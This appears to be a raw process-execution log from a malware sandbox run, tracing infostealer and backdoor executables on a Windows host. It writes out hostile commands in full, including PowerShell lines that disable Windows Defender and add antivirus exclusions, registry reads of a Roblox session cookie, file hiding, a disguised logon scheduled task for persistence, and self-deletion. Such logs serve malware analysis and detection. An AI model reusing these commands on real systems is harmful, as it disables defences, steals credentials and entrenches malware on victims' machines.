C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe"
C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe
C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe" -service -lunch
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\winn.exe' -Force
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\2946613613.exe
C:\Users\Admin\AppData\Local\Temp\2946613613.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\SysWOW64\reg.exe
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /delete /f /tn Windows Upgrade Manager
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\SYSTEM32\rundll32.exe
rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\248483651.exe
C:\Users\Admin\AppData\Local\Temp\248483651.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE"
C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE
C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"
C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe
C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe
C:\Users\Admin\AppData\Local\Temp\322341857.exe
C:\Users\Admin\AppData\Local\Temp\322341857.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe
"C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\2767925072.exe
C:\Users\Admin\AppData\Local\Temp\2767925072.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2928124777.exe
C:\Users\Admin\AppData\Local\Temp\2928124777.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE"
C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE
C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe"
C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe
C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe
C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\3058827245.exe
C:\Users\Admin\AppData\Local\Temp\3058827245.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE" && pause
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\SysWOW64\PING.EXE
ping localhost
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe"
C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe
C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
